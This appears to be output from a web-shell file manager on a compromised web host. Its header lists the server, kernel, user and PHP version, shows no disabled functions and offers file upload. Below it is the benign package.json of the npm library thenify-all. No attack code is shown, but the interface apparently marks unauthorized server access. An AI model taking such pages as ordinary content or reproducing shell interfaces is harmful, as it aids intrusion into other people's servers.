HEX
Server: nginx/1.28.3
System: Linux lightweb-s1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64
User: drdrivek-71 (1047)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: /home/mocapict-106/mocapictures.kr/node_modules/thenify-all/package.json
{
  "name": "thenify-all",
  "description": "Promisifies all the selected functions in an object",
  "version": "1.6.0",
  "author": "Jonathan Ong <me@jongleberry.com> (http://jongleberry.com)",
  "license": "MIT",
  "repository": "thenables/thenify-all",
  "dependencies": {
    "thenify": ">= 3.1.0 < 4"
  },
  "devDependencies": {
    "bluebird": "2",
    "istanbul": "0",
    "mocha": "2"
  },
  "scripts": {
    "test": "mocha --reporter spec",
    "test-cov": "istanbul cover node_modules/.bin/_mocha -- --reporter dot",
    "test-travis": "istanbul cover node_modules/.bin/_mocha --report lcovonly -- --reporter dot"
  },
  "keywords": [
    "promisify",
    "promise",
    "thenify",
    "then",
    "es6"
  ],
  "files": [
    "index.js"
  ],
  "engines": {
    "node": ">=0.8"
  }
}